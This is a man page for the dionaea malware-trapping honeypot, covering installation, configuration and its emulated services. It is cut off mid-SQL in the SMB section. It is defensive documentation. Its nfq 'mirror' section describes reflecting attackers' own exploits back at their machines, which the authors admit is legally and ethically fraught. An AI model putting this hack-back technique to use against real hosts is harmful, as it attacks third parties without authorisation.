1DIONAEA(1)                          dionaea                         DIONAEA(1)
2
3
4

NAME

6       dionaea - dionaea Documentation
7
8       Dionaea  is  meant  to  be  a  nepenthes successor, embedding python as
9       scripting language, using libemu to detect shellcodes, supporting  ipv6
10       and tls
11
12       WARNING:
13          The documentation is work in progress.
14
15       Content:
16

INTRODUCTION

18   How it works
19       dionaea intention is to trap malware exploiting vulnerabilities exposed
20       by services offerd to a network, the ultimate goal is gaining a copy of
21       the malware.
22
23   Security
24       As  Software  is likely to have bugs, bugs in software offering network
25       services can be exploitable, and dionaea is software  offering  network
26       services, it is likely dionaea has exploitable bugs.
27
28       Of  course  we  try  to  avoid it, but if nobody would fail when trying
29       hard, we would not need software such as dionaea.
30
31       So, in order to minimize the impact, dionaea can drop  privileges,  and
32       chroot.
33
34       To be able to run certain actions which require privileges, after dion‐
35       aea dropped them, dionaea creates a child process at startup, and  asks
36       the  child  process  to  run actions which require elevated privileges.
37       This does not guarantee anything, but it should be harder to  get  gain
38       root  access  to the system from an unprivileged user in a chroot envi‐
39       ronment.
40
41   Network Connectivity
42       Given the softwares intented use, network io is crucial. All network io
43       is  within  the main process in a so called non-blocking manner. To un‐
44       derstand nonblocking, imagine you have many pipes infront of  you,  and
45       these  pipes can send you something, and you can put something into the
46       pipe. If you want to put something into a pipe, while  it  is  crowded,
47       you’d have to wait, if you want to get something from a pipe, and there
48       is nothing, you’d have to wait too. Doing this pipe  game  non-blocking
49       means  you  won’t  wait  for the pipes to be write/readable, you’ll get
50       something off the pipes once data arrives, and write once the  pipe  is
51       not  crowded.  If  you want to write a large chunk to the pipe, and the
52       pipe is crowded after a small piece, you note the rest of the chunk you
53       wanted to write, and wait for the pipe to get ready.
54
55       DNS  resolves  are done using libudns, which is a neat non-blocking dns
56       resolving library with support for AAAA records and chained cnames.  So
57       much about non-blocking.
58
59       dionaea uses libev to get notified once it can act on a socket, read or
60       write.
61
62       dionaea can offer services via tcp/udp and tls for IPv4 and  IPv6,  and
63       can  apply  rate  limiting and accounting limits per connections to tcp
64       and tls connections - if required.
65

INSTALLATION

67       At the time of writing the best choice to install dionaea on  a  server
68       is  to use Ubuntu 14.04, but below you can find how to install it (from
69       source) on other distributions/operating systems.
70
71   Basic stuff
72   Download the source code
73       You can download the source code from the release page or by using  the
74       git command.
75
76          git clone https://github.com/DinoTools/dionaea.git
77          cd  dionaea
78
79   Arch Linux
80       Packages for dionaea are available from the Arch User Repository (AUR).
81       Use a package manager like yaourt that can handle and install  packages
82       from the AUR.
83
84       Before you start install the required build tools.
85
86          $ yaourt -S base-devel
87
88       After the requirements have been installed successfully you can install
89       dionaea.  This will checkout the latest sources from  the  git  reposi‐
90       tory, run the build process and install the package.
91
92          $ yaourt -S dionaea-git
93
94       After the installation has been completed you may want to edit the con‐
95       fig file /etc/dionaea/dionaea.conf.  If everything looks fine the dion‐
96       aea service can bee started by using the following command.
97
98          $ sudo systemctl start dionaea
99
100       The  log  files  and  everything captured can be found in the directory
101       /var/lib/dionaea/.
102
103   Ubuntu 16.04
104   From Source
105       Before you start download the source code of dionaea.
106
107       Install required build dependencies  before  configuring  and  building
108       dionaea. (‘ttf-liberation’ required to ‘util/gnuplotsql.py’)
109
110          sudo apt-get install \
111              autoconf \
112              automake \
113              build-essential \
114              check \
115              cython3 \
116              libcurl4-openssl-dev \
117              libemu-dev \
118              libev-dev \
119              libglib2.0-dev \
120              libloudmouth1-dev \
121              libnetfilter-queue-dev \
122              libnl-3-dev \
123              libpcap-dev \
124              libssl-dev \
125              libtool \
126              libudns-dev \
127              python3 \
128              python3-dev \
129              python3-bson \
130              python3-yaml \
131              ttf-liberation
132
133       After  all  dependencies have been installed successfully run autreconf
134       to build or rebuild the build scripts.
135
136          autoreconf -vi
137
138       Run configure to configure the build scripts.
139
140          ./configure \
141              --disable-werror \
142              --prefix=/opt/dionaea \
143              --with-python=/usr/bin/python3 \
144              --with-cython-dir=/usr/bin \
145              --with-ev-include=/usr/include/ \
146              --with-ev-lib=/usr/lib \
147              --with-emu-lib=/usr/lib/libemu \
148              --with-emu-include=/usr/include \
149              --with-nl-include=/usr/include/libnl3 \
150              --with-nl-lib=/usr/lib
151
152       Now you should be able to run make to build and run make install to in‐
153       stall the honeypot.
154
155          make
156          sudo make install
157
158       The new honeypot can be found in the directory /opt/dionaea.
159
160   Ubuntu 14.04
161   Package based
162       Nightly packages are provided in a Personal Package Archive (PPA).  Be‐
163       fore you start you should update all packages to get the  latest  secu‐
164       rity updates.
165
166          $ sudo apt-get update
167          $ sudo apt-get dist-upgrade
168
169       First of all install the tools to easily manage PPA resources.
170
171          $ sudo apt-get install software-properties-common
172
173       After  the  required  tools have been installed you can add the PPA and
174       update the package cache.
175
176          $ sudo add-apt-repository ppa:honeynet/nightly
177          $ sudo apt-get update
178
179       If everything worked without any errors you should be able  to  install
180       the dionaea package.
181
182          $ sudo apt-get install dionaea
183
184       After the installation has been completed you may want to edit the con‐
185       fig file /etc/dionaea/dionaea.conf.  If everything looks fine the dion‐
186       aea service can bee started by using the following command.
187
188          $ sudo service dionaea start
189
190       The  log  files can be found in the directory /var/log/dionaea/ and ev‐
191       erything else captured and logged by the honeypot can be found  in  the
192       directory /var/lib/dionaea/.
193
194   From Source
195       Before you start download the source code of dionaea.
196
197       Install  required  build  dependencies  before configuring and building
198       dionaea.
199
200          $ sudo apt-get install \
201              autoconf \
202              automake \
203              build-essential \
204              check \
205              cython3 \
206              libcurl4-openssl-dev \
207              libemu-dev \
208              libev-dev \
209              libglib2.0-dev \
210              libloudmouth1-dev \
211              libnetfilter-queue-dev \
212              libnl-dev \
213              libpcap-dev \
214              libssl-dev \
215              libtool \
216              libudns-dev \
217              python3 \
218              python3-dev \
219              python3-bson \
220              python3-yaml
221
222       After all dependencies have been installed successfully  run  autreconf
223       to build or rebuild the build scripts.
224
225          autoreconf -vi
226
227       Run configure to configure the build scripts.
228
229          ./configure \
230              --disable-werror \
231              --prefix=/opt/dionaea \
232              --with-python=/usr/bin/python3 \
233              --with-cython-dir=/usr/bin \
234              --with-ev-include=/usr/include \
235              --with-ev-lib=/usr/lib \
236              --with-emu-lib=/usr/lib/libemu \
237              --with-emu-include=/usr/include \
238              --with-nl-include=/usr/include/libnl3 \
239              --with-nl-lib=/usr/lib
240
241       Now you should be able to run make to build and run make install to in‐
242       stall the honeypot.
243
244          make
245          sudo make install
246
247       The new honeypot can be found in the directory /opt/dionaea.
248
249   3rd-party packages
250       The packages below are 3rd party provided, which  is  appreciated.   If
251       you have compiled a package for your own distribution, just send me the
252       link or make a pull request.
253

CONFIGURATION

255       If you want to change the software, it is really  important  to  under‐
256       stand  how  it  works,  therefore please take the time to how it works.
257       dionaea.cfg is the main configuration file.  In the example  below  you
258       can see the default configuration.
259
260       dionaea.cfg
261
262          [dionaea]
263          download.dir=/var/lib/dionaea/binaries/
264          modules=curl,python,nfq,emu,pcap
265          processors=filter_streamdumper,filter_emu
266
267          listen.mode=getifaddrs
268          # listen.addresses=127.0.0.1
269          # listen.interfaces=eth0,tap0
270
271          # Country
272          # ssl.default.c=GB
273          # Common Name/domain name
274          # ssl.default.cn=
275          # Organization
276          # ssl.default.o=
277          # Organizational Unit
278          # ssl.default.ou=
279
280          [logging]
281          default.filename=/var/log/dionaea/dionaea.log
282          default.levels=all
283          default.domains=*
284
285          errors.filename=/var/log/dionaea/dionaea-errors.log
286          errors.levels=warning,error
287          errors.domains=*
288
289          [processor.filter_emu]
290          name=filter
291          config.allow.0.protocols=smbd,epmapper,nfqmirrord,mssqld
292          next=emu
293
294          [processor.filter_streamdumper]
295          name=filter
296          config.allow.0.types=accept
297          config.allow.1.types=connect
298          config.allow.1.protocols=ftpctrl
299          config.deny.0.protocols=ftpdata,ftpdatacon,xmppclient
300          next=streamdumper
301
302          [processor.streamdumper]
303          name=streamdumper
304          config.path=/var/lib/dionaea/bistreams/%Y-%m-%d/
305
306          [processor.emu]
307          name=emu
308          config.limits.files=3
309          #512 * 1024
310          config.limits.filesize=524288
311          config.limits.sockets=3
312          config.limits.sustain=120
313          config.limits.idle=30
314          config.limits.listen=30
315          config.limits.cpu=120
316          #// 1024 * 1024 * 1024
317          config.limits.steps=1073741824
318
319          [module.nfq]
320          queue=2
321
322          [module.nl]
323          # set to yes in case you are interested in the mac address  of the remote (only works for lan)
324          lookup_ethernet_addr=no
325
326          [module.python]
327          imports=dionaea.log,dionaea.services,dionaea.ihandlers
328          sys_paths=default
329          service_configs=/etc/dionaea/services-enabled/*.yaml
330          ihandler_configs=/etc/dionaea/ihandlers-enabled/*.yaml
331
332          [module.pcap]
333          any.interface=any
334
335
336
337   dionaea
338       download.dir
339          Global download directory used by some ihandlers.
340
341       listen.mode:
342          There are basically three modes how dionaea can bind the services to
343          IP addresses.
344
345
346
347            getifaddrs - auto
348                   This will get a list of all IP addresses of  all  available
349                   interfaces  and  bind  the services to each IP.  It is also
350                   possible to specify a list of interfaces to  use  by  using
351                   the listen.interfaces perameter.
352
353
354
355            manual - your decision
356                   In  this  mode  you have to specify an additional parameter
357                   listen.addresses.  This is a comma separated list of IP ad‐
358                   dresses dionaea should bind the services to.
359
360
361
362            nl, will require a list of interfaces
363                   You  have  to  specify a comma separated list of interfaces
364                   names with the listen.interfaces parameter.  If an  IP  ad‐
365                   dress  is  added to an interfaces or removed from an inter‐
366                   face dionaea will lunch or stop all services for this IP.
367
368       modules
369          Comma separated list of modules.
370
371       processors
372          Comma separated list of processors.
373
374       ssl.default.c
375          Two letter id of the Country.
376
377       ssl.default.cn
378          The Common Name/domain name of the generated SSL/TLS certificate.
379
380       ssl.default.o
381          The Organization name.
382
383       ssl.default.ou
384          The name of the Organizational Unit.
385
386   Logging
387       dionaea has a general application log.  This logs are ment to  be  used
388       for  debugging  and  to track errors.  It is not recommended to analyse
389       this files to track attacks.
390
391       filename
392          The filename of the logfile.
393
394       levels
395          Only log messages that match the specified log level get  logged  to
396          the logfile.
397
398          Available log levels:
399
400          • debug
401
402          • info
403
404          • warning
405
406          • error
407
408          • critical
409
410          • all = Special log level including all log levels
411
412          Examples:
413
414          Log only messages with level warning and error
415
416              errors.levels=warning,error
417
418          Log all log messages but exclude messages with log level debug
419
420              errors.levels=all,-debug
421
422       domain
423          Only log messages in a specified domain.
424
425   Modules
426       Only  modules specified by the modules value in the dionaea section are
427       loaded during the start up.
428
429       Every module might have its own config section with  additional  config
430       parameters.   The  section  name  consists of the prefix module and the
431       module name speratated by a dot(.).
432
433       See the module/index documentation to find more information on  how  to
434       configure the modules.
435
436   Processors
437       The specified processors will be used as an entry point in the process‐
438       ing pipeline.  In most cases the initial processor  will  be  a  filter
439       processor  <processor/filter>.   The  next processor in the pipeline is
440       specified by the next parameter.
441
442       See the processor/index documentation to find more information  on  how
443       to configure the processors.
444

RUNNING DIONAEA

446       The  software  has  some  flags you can provide at startup, the -h flag
447       shows the help, the -H includes the default values.
448
449          $ /opt/dionaea/bin/dionaea -H
450            -c, --config=FILE               use FILE as configuration file
451                                              Default value/behaviour: /opt/dionaea/etc/dionaea/dionaea.cfg
452            -D, --daemonize                 run as daemon
453            -g, --group=GROUP               switch to GROUP after startup (use with -u)
454                                              Default value/behaviour: keep current group
455            -G, --garbage=[collect|debug]   garbage collect,  usefull to debug memory leaks,
456                                            does NOT work with valgrind
457            -h, --help                      display help
458            -H, --large-help                display help with default values
459            -l, --log-levels=WHAT           which levels to log, valid values
460                                            all, debug, info, message, warning, critical, error
461                                            combine using ',', exclude with - prefix
462            -L, --log-domains=WHAT          which domains use * and ? wildcards, combine using ',',
463                                            exclude using -
464            -u, --user=USER                 switch to USER after startup
465                                              Default value/behaviour: keep current user
466            -p, --pid-file=FILE             write pid to file
467            -r, --chroot=DIR                chroot to DIR after startup
468                                              Default value/behaviour: don't chroot
469            -V, --version                   show version
470            -w, --workingdir=DIR            set the process' working dir to DIR
471                                              Default value/behaviour: /opt/dionaea
472
473          examples:
474              # dionaea -l all,-debug -L '*'
475              # dionaea -l all,-debug -L 'con*,py*'
476              # dionaea -u nobody -g nogroup -w /opt/dionaea -p /opt/dionaea/var/run/dionaea.pid
477

INTEGRATION

479       A list of applications and tools to  collect  information  exported  by
480       dionaea.
481
482   DTAG Community Honeypot Project
483       The DTAG Community Honeypot Project has been started in 2010 by a small
484       group of enthusiasts of the Deutsche  Telekom.   They  are  maintaining
485       T-Pot  a Multi-Honeypot Platform.  It is based on well established hon‐
486       eypots including dionaea.
487
488       • Website: DTAG Community Honeypot Project
489
490       • Status: active
491
492   DionaeaFR
493       DionaeaFR is a web-frontend to display attack information.  It uses the
494       SQLite database provided by the log_sqlite ihandler.
495
496       • Website: DionaeaFR
497
498       • Status: unmaintained since 2014
499
500   DIY with log_json
501       You  can  use  the log_json incident handler in combination with an ELK
502       stack to collect, aggregate and visualize attack information.
503
504       • Website: ELK stack
505
506       • Status: active
507
508   Modern Honey Network(mhn)
509       A tool to deploy honeypots, collect attack information and display  ag‐
510       gregated statistics.
511
512       • Website: Modern Honey Network
513
514       • Status:  active,  but  deploys an pre 0.2(2014) version of dionaea by
515         default.
516

MODULES

518       The subsections name is the name of the  module  dionaea  will  try  to
519       load,  most  modules  got rather simplistic names, the pcap module will
520       use libpcap, the curl module libcurl,  the  emu  module  libemu  …  The
521       python module is special, as the python module can load python scripts,
522       which offer services, and each services can have its own options.
523
524       List of available modules
525
526   curl
527       The curl module is used to transfer files from and to  servers,  it  is
528       used to download files via http as well as submitting files to 3rd par‐
529       ties.
530
531   emu
532       The emu module is used to detect, profile and - if required  -  execute
533       shellcode.
534
535   pcap
536       The  pcap module uses the libpcap library to detect rejected connection
537       attempts, so even if we do not accept a connection, we can use the  in‐
538       formation somebody wanted to connect there.
539
540   python
541       The  python  module allows using the python interpreter in dionaea, and
542       allows controlling some scripts dionaea uses
543

SERVICE

545       Network services speak a certain language, this language is called pro‐
546       tocol.   When we started deploying honeypots, you could trap worms just
547       by opening a single port, and wait for them to connect and send you  an
548       url  where  you  could download a copy of the worm. The service getting
549       attacked was the backdoor of the bagle mailworm, and it did not require
550       and interaction.  Later on, the exploitations of real services got more
551       complex, and you had to reply something to the worm to fool him.  Nowa‐
552       days  worms  use  API to access services, before sending their payload.
553       To allow easy adjustments to the procotol, dionaea implements the  pro‐
554       tocols  in  python.  There is a glue between the network layer which is
555       done in the c programming language and the  embedded  python  scripting
556       language,  which  allows  using the non-blocking connections in python.
557       This has some benefits, for example we can use non-blocking tls connec‐
558       tions  in  python, and we even get rate limiting on them (if required),
559       where pythons own io does not offer such things. On the other hand,  it
560       is  much  more  comfortable to implement protocols in python than doing
561       the same in c.
562
563       List of available services
564
565   Black hole
566       The black hole module can be used to bind a service  to  a  port.   The
567       service  does not respond to any submitted data.  But the bistreams can
568       be used to create new modules.
569
570   Example config
571       services/blackhole.yaml
572
573          - name: blackhole
574            config:
575              services:
576                # Telnet
577                - port: 23
578                  protocol: tcp
579
580                # DNS
581                - port: 53
582                  protocol: udp
583                - port: 53
584                  protocol: tcp
585
586                # NTP
587                - port: 123
588                  protocol: udp
589
590
591   EPMAP
592   Example config
593       services/epmap.yaml
594
595          - name: epmap
596
597
598   FTP
599       Dionaea provives a basic ftp server on port 21, it can create  directo‐
600       ries  and  upload  and download files. From my own experience there are
601       very little automated attacks on ftp services and I’m yet to see  some‐
602       thing interesting happening on port 21.
603
604   Example config
605       services/ftp.yaml
606
607          - name: ftp
608            config:
609              root: /var/lib/dionaea/roots/ftp
610              response_messages:
611                welcome_msg: 220 DiskStation FTP server ready.
612
613
614   HTTP
615       Dionaea supports http on port 80 as well as https, but there is no code
616       making use of the  data  gathered  on  these  ports.   For  https,  the
617       self-signed ssl certificate is created at startup.
618
619   Configure
620       Example configuration:
621
622          - name: http
623            config:
624              root = "var/dionaea/wwwroot"
625
626       default_headers
627          Default  header fields are send if none of the other header patterns
628          match.
629
630       global_headers
631          Global header fields are added to all response headers.
632
633       headers
634          List of header fields to be used in the response header.   Only  ap‐
635          plied if filename_pattern, status_code and methods match.  The first
636          match in the list is used.
637
638       max_request_size
639          Maximum size in kbytes of the request. 32768 = 32MB
640
641       root
642          The root directory so serve files from.
643
644   Example config
645       services/http.yaml
646
647          - name: http
648            config:
649              root: "/var/lib/dionaea/roots/www"
650              ports:
651                - 80
652              ssl_ports:
653                - 443
654              max_request_size: 32768 # maximum size in kbytes of the request (32MB)
655              global_headers:
656                - ["Server", "nginx"]
657              headers:
658                - filename_pattern: ".*\\.php"
659                  headers:
660                    - ["Content-Type", "text/html; charset=utf-8"]
661                    - ["Content-Length", "{content_length}"]
662                    - ["Connection", "{connection}"]
663                    - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]
664              # soap_enabled: false
665              template:
666                # set to true to enable template processing
667                # this feature requires jinja2 template engine http://jinja.pocoo.org/
668                enabled: false
669                file_extension: .j2
670                path: "/var/lib/dionaea/share/python/http/template/nginx"
671                templates:
672                  autoindex:
673                    filename: autoindex.html.j2
674                  error_pages:
675                    - filename: error.html.j2
676                    # - filename: error/{code}.html.j2
677                # used to specify additional template values
678                values:
679                  # full_name: nginx/1.1
680
681
682   Additional examples
683       Set the Server response field.
684
685          - name: http
686            config:
687              global_headers:
688                - ["Server", "nginx"]
689
690       Define headers to use if the filename matches a pattern.
691
692          - name: http
693            config:
694              headers:
695                - filename_pattern: ".*\\.php"
696                  headers:
697                    - ["Content-Type", "text/html; charset=utf-8"]
698                    - ["Content-Length", "{content_length}"]
699                    - ["Connection", "{connection}"]
700                    - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]
701
702   Memache
703       Dionaea can emulate a very basic memcached server.
704
705   Configure
706   Example config
707       services/memcache.yaml
708
709          - name: memcache
710
711
712   Mirror
713   Example config
714       services/mirror.yaml
715
716          - name: mirror
717
718
719   MongoDB
720       This module add initial support to emulates a MongoDB server  with  the
721       dionaea honeypot.  At the moment it is very limited and the functional‐
722       ity might be improved in one of the next releases.
723
724   Requirements
725       • bson module for Python 3
726
727   Example config
728       services/mongo.yaml
729
730          - name: mongo
731
732
733   MQTT
734   Example config
735       services/mqtt.yaml
736
737          - name: mqtt
738
739
740   MSSQL
741       This module implements the Tabular Data Stream protocol which  is  used
742       by  Microsoft  SQL Server. It listens to tcp/1433 and allows clients to
743       login. It can decode queries run on the database, but as  there  is  no
744       database,  dionaea  can’t  reply, and there is no further action. Typi‐
745       cally we always get the same query:
746
747          exec sp_server_info 1 exec sp_server_info 2 exec sp_server_info 500 select 501,NULL,1 where 'a'='A' select 504,c.name,c.description,c.definition from master.dbo.syscharsets c,master.dbo.syscharsets c1,master.dbo.sysconfigures f where f.config=123 and f.value=c1.id and c1.csid=c.id set textsize 2147483647 set arithabort on
748
749       Refer             to              the              blog              <‐
750       http://carnivore.it/2010/09/11/mssql_attacks_examined>  for more infor‐
751       mation.  Patches would be appreciated.
752
753   Example config
754       services/mssql.yaml
755
756          - name: mssql
757
758
759   MySQL
760       This module implements the MySQL wire stream protocol -  backed  up  by
761       sqlite  as  database.  Please  refer to 2011-05-15 Extending Dionaea <‐
762       http://carnivore.it/2011/05/15/extending_dionaea> for more information.
763
764   Example config
765       services/mysql.yaml
766
767          - name: mysql
768            config:
769              databases:
770                information_schema:
771                  path: ":memory:"
772                # example how to extend this
773                # just provide a databasename and path to the database
774                # the database can be altered by attackers, so ... better use a copy
775          #      psn:
776          #        path: "/path/to/cc_info.sqlite"
777
778
779   nfq
780       The python nfq script is the counterpart to the nfq module.  While  the
781       nfq  module interacts with the kernel, the nfq python script takes care
782       of the required steps to start a new service on the ports.  nfq can in‐
783       tercept  incoming  tcp connections during the tcp handshake giving your
784       honeypot the possibility to provide service  on  ports  which  are  not
785       served by default.
786
787       As  dionaea  can  not  predict which protocol will be spoken on unknown
788       ports, neither implement the protocol by itself, it  will  connect  the
789       attacking host on the same port, and use the attackers server side pro‐
790       tocol implementation to reply to the client requests  of  the  attacker
791       therefore  dionaea can end up re?exploiting the attackers machine, just
792       by sending him the exploit he sent us.
793
794       The technique is a brainchild of Tillmann Werner, who  used  it  within
795       his  honeytrap  <http://honeytrap.carnivore.it> honeypot.  Legal bound‐
796       aries to such behaviour may be different in each country,  as  well  as
797       ethical boundaries for each individual.  From a technical point of view
798       it works, and gives good results.  Learning from the best, I decided to
799       adopt this technique for dionaea.  Besides the legal and ethical issues
800       with this approach, there are some technical things which  have  to  be
801       mentioned
802
803       port scanning
804          If your honeypot gets port scanned, it would open a service for each
805          port scanned, in worst case you’d end up with offering 64k  services
806          per  ip  scanned.  By default you’d run out of fds at about 870 ser‐
807          vices offerd, and experience weird behaviour.  Therefore the  impact
808          of port scanning has to be limited.  The kiss approach taken here is
809          a sliding window of throttle.window seconds size.  Each slot in this
810          sliding  window  represents a second, and we increment this slot for
811          each connection we accept.  Before we accept a connection, we  check
812          if  the  sum of all slots is below throttle.limits.total, else we do
813          not create a new service.  If the sum is below the limit,  we  check
814          if  the current slot is below the slot limit too, if both are given,
815          we create a new service.  If one of the condition fails, we  do  not
816          spawn  a new service, and let nfqeueu process the packet.  There are
817          two ways to process packets which got throttled:
818
819NF_ACCEPT (=1), which will let the packet pass the kernel, and  as
820            there is no service listening, the packet gets rejected.
821
822NF_DROP (=0), which will drop the packet in the kernel, the remote
823            does not get any answer to his SYN.
824
825          I prefer NF_DROP, as port scanners such as nmap tend to limit  their
826          scanning speed, once they notice packets get lost.
827
828       recursive-self-connecting
829          Assume some shellcode or download instructions makes dionaea to
830
831          • connect itself on a unbound port
832
833          • nfq intercepts the attempt
834
835          • spawns a service
836
837          • accepts the connection #1
838
839          • creates  mirror connection for connection #1 by connecting the re‐
840            motehost (itself) on the same port #2
841
842          • accepts connection #2 as connection #3
843
844          • creates mirror connection for connection #3 by connecting the  re‐
845            motehost (itself) on the same port #4
846
847          • …
848
849          Such  recursive loop, has to be avoided for obvious reasons.  There‐
850          fore dionaea checks if the remote host connecting a nfq mirror is  a
851          local address using ‘getifaddrs’ and drops local connections.
852
853       So much about the known problems and workarounds …
854
855       If  you  read  that  far,  you want to use it despite the technical/le‐
856       gal/ethical problems.  So … You’ll need iptables, and  you’ll  have  to
857       tell  iptables  to  enqueue packets which would establish a new connec‐
858       tion.  I recommend something like this:
859
860          iptables -t mangle -A PREROUTING -i eth0 -p tcp -m socket -j ACCEPT
861          iptables -t mangle -A PREROUTING -i eth0 -p tcp --syn -m state --state NEW -j NFQUEUE --queue-num 5
862
863       Explanation:
864
865          1. ACCEPT all connections to existing services
866
867          2. enqueue all other packets to the NFQUEUE
868
869       If you have dionaea running on your NAT router, I  recommend  something
870       like:
871
872          iptables -t mangle -A PREROUTING -i ppp0 -p tcp -m socket -j ACCEPT
873          iptables -t mangle -A PREROUTING -i ppp0 -p tcp --syn -m state --state NEW -j MARK --set-mark 0x1
874          iptables -A INPUT -i ppp0 -m mark --mark 0x1 -j NFQUEUE
875
876       Explanation:
877
878          1. ACCEPT all connections to existing services in mangle::PREROUTING
879
880          2. MARK all other packets
881
882          3. if we see these marked packets on INPUT, queue them
883
884       Using something like:
885
886          iptables -A INPUT -p tcp --tcp-flags SYN,RST,ACK,FIN SYN -j NFQUEUE --queue-num 5
887
888       will  enqueue  /all/  SYN packets to the NFQUEUE, once you stop dionaea
889       you will not even be able to connect to your ssh daemon.
890
891       Even if you add an exemption for ssh like:
892
893          iptables -A INPUT -i eth0 -p tcp --syn -m state --state NEW --destination-port ! 22 -j NFQUEUE
894
895       dionaea will try to create a new service for /every/  incoming  connec‐
896       tion,  even  if  there  is a service running already.  As it is easy to
897       avoid this, I recommend sticking with the recommendation.  Besides  the
898       already  mention  throttle settings, there are various timeouts for the
899       nfq mirror service in the config.  You can control how long the service
900       will  wait for new connections (/timeouts.server.listen/), and how long
901       the mirror connection will be idle (/timeouts.client.idle/) and sustain
902       (/timeouts.client.sustain/).
903
904   PPTP
905   Example config
906       services/pptp.yaml
907
908          - name: pptp
909            config:
910          # Cisco PIX
911          #    firmware_revision: 4608
912          #    hostname:
913          #    vendor_name: Cisco Systems
914
915          # DrayTek
916          #    firmware_revision: 1
917          #    hostname: Vigor
918          #    vendor_name: DrayTek
919
920          # Linux
921          #    firmware_revision: 1
922          #    hostname: local
923          #    vendor_name: linux
924
925          # Windows
926          #    firmware_revision: 0
927          #    hostname:
928          #    vendor_name: Microsoft
929
930          # MikroTik router
931          #    firmware_revision: 1
932          #    hostname: MikroTik
933          #    vendor_name: MikroTik
934
935
936   SIP (VoIP)
937       This  is a VoIP module for the honeypot dionaea. The VoIP protocol used
938       is SIP since it is the de facto standard for VoIP today. In contrast to
939       some  other  VoIP honeypots, this module doesn’t connect to an external
940       VoIP registrar/server. It simply waits for incoming SIP messages  (e.g.
941       OPTIONS or even INVITE), logs all data as honeypot incidents and/or bi‐
942       nary data dumps (RTP traffic), and reacts accordingly, for instance  by
943       creating a SIP session including an RTP audio channel. As sophisticated
944       exploits within the SIP payload are not very common yet,  the  honeypot
945       module  doesn’t  pass any code to dionaea’s code emulation engine. This
946       will be implemented if we spot such malicious messages. The  main  fea‐
947       tures of the VoIP module are:
948
949       • Support for most SIP requests (OPTIONS, INVITE, ACK, CANCEL, BYE)
950
951       • Support for multiple SIP sessions and RTP audio streams
952
953       • Record all RTP data (optional)
954
955       • Set custom SIP username and secret (password)
956
957       • Set custom useragent to mimic different phone models
958
959       • Uses dionaea’s incident system to log to SQL database
960
961   Personalities
962       A  personality  defines how to handle a request. At least the ‘default’
963       personality MUST exist. The following options are available per person‐
964       ality.
965
966       serve
967          A list of IP addresses to use this personality for.
968
969       handle
970          List of SIP methods to handle.
971
972   SIP Users
973       You  can  easily add, change or remove users by editing the SQLite file
974       specified by the ‘users = “”’ parameter in the config file.  All  users
975       are specified in the users table.
976
977       username
978          Specifies the name of the user. This value is treated as regular ex‐
979          pression.     See      Python:      Regular      Expressions      <‐
980          http://docs.python.org/py3k/library/re.html> for more information.
981
982       password
983          The password.
984
985       personality
986          The  user  is  only  available  in the personality specified by this
987          value. You can define a personality in the config file.
988
989       pickup_delay_min
990          This is an integer value. Let the phone ring for at least this  num‐
991          ber of seconds.
992
993       pickup_delay_max
994          This  is  an integer value. Maximum number of seconds to wait before
995          dionaea picks up the phone.
996
997       action
998          This value isn’t in use, yet.
999
1000       sdp
1001          The name of the SDP to use. See table ‘sdp’.
1002
1003   SDP
1004       All SDPs can be defined in the sdp table in the users database.
1005
1006       name
1007          Name of the SDP
1008
1009       sdp
1010          The value to use as SDP
1011
1012       The following values are available in the SDP definition.
1013
1014       {addrtype}
1015          Address type. (IP4 or IP6)
1016
1017       {unicast_address}
1018          RTP address
1019
1020       {audio_port}
1021          Dionaea audio port.
1022
1023       {video_port}
1024          Dionaea video port.
1025
1026       The following control parameters are available in the SDP definition.
1027
1028       [audio_port]…content…[/audio_port]
1029          The content is only available in the output if the audio_port  value
1030          is set.
1031
1032       [video_port]…content…[/video_port]
1033          The  content is only available in the output if the video_port value
1034          is set.
1035
1036       Example:
1037
1038          v=0
1039          o=- 1304279835 1 IN {addrtype} {unicast_address}
1040          s=SIP Session
1041          c=IN {addrtype} {unicast_address}
1042          t=0 0
1043          [audio_port]
1044          m=audio {audio_port} RTP/AVP 111 0 8 9 101 120
1045          a=sendrecv
1046          a=rtpmap:111 Speex/16000/1
1047          a=fmtp:111 sr=16000,mode=any
1048          a=rtpmap:0 PCMU/8000/1
1049          a=rtpmap:8 PCMA/8000/1
1050          a=rtpmap:9 G722/8000/1
1051          a=rtpmap:101 telephone-event/8000
1052          a=fmtp:101 0-16,32,36
1053          a=rtpmap:120 NSE/8000
1054          a=fmtp:120 192-193
1055          [/audio_port]
1056          [video_port]
1057          m=video {video_port} RTP/AVP 34 96 97
1058          c=IN {addrtype} {unicast_address}
1059          a=rtpmap:34 H263/90000
1060          a=fmtp:34 QCIF=2
1061          a=rtpmap:96 H263-1998/90000
1062          a=fmtp:96 QCIF=2
1063          a=rtpmap:97 H263-N800/90000
1064          [/video_port]
1065
1066   Example config
1067       services/sip.yaml
1068
1069          - name: sip
1070            config:
1071              udp_ports:
1072                - 5060
1073              tcp_ports:
1074                - 5060
1075              tls_ports:
1076                - 5061
1077              users: "@LOCALESTATEDIR@/lib/dionaea/sipaccounts.sqlite"
1078              rtp:
1079                enable: true
1080                # how to dump the rtp stream
1081                # bistream = dump as bistream
1082                modes:
1083                  - bistream
1084                  - pcap
1085                pcap:
1086                  path: "var/dionaea/rtp/{personality}/%Y-%m-%d/"
1087                  filename: "%H:%M:%S_{remote_host}_{remote_port}_in.pcap"
1088              personalities:
1089                default:
1090                  domain: "localhost"
1091                  name: "softphone"
1092                  personality: "generic"
1093          #      next-server:
1094          #        domain: "my-domain"
1095          #        name: "my server"
1096          #        personality: "generic"
1097          #        serve: ["10.0.0.1"]
1098          #        default_sdp: "default"
1099          #        handle: ["REGISTER", "INVITE", "BYE", "CANCEL", "ACK"]
1100
1101              actions:
1102                bank-redirect:
1103                  do: "redirect"
1104                  params:
1105                play-hello:
1106                  do: "play"
1107                  params:
1108                    file: "var/dionaea/.../file.ext"
1109
1110
1111   SMB
1112       The main protocol offerd by dionaea is SMB. SMB has a decent history of
1113       remote exploitable bugs, and is a very popular target for worms.  dion‐
1114       aeas SMB implementation makes use of  an  python3  adapted  version  of
1115       scapy.  As  scapys own version of SMB was pretty limited, almost every‐
1116       thing but the Field declarations had to be rewritten. The SMB emulation
1117       written    for    dionaea    is    used    by    the    mwcollectd   <‐
1118       http://code.mwcollect.org> low interaction honeypot too.   Besides  the
1119       known  attacks  on  SMB dionaea supports uploading files to smb shares.
1120       Adding new DCE remote procedure calls is a good start to get into dion‐
1121       aea code, you can use:
1122
1123          SELECT
1124                  COUNT(*),
1125                  dcerpcrequests.dcerpcrequest_uuid,
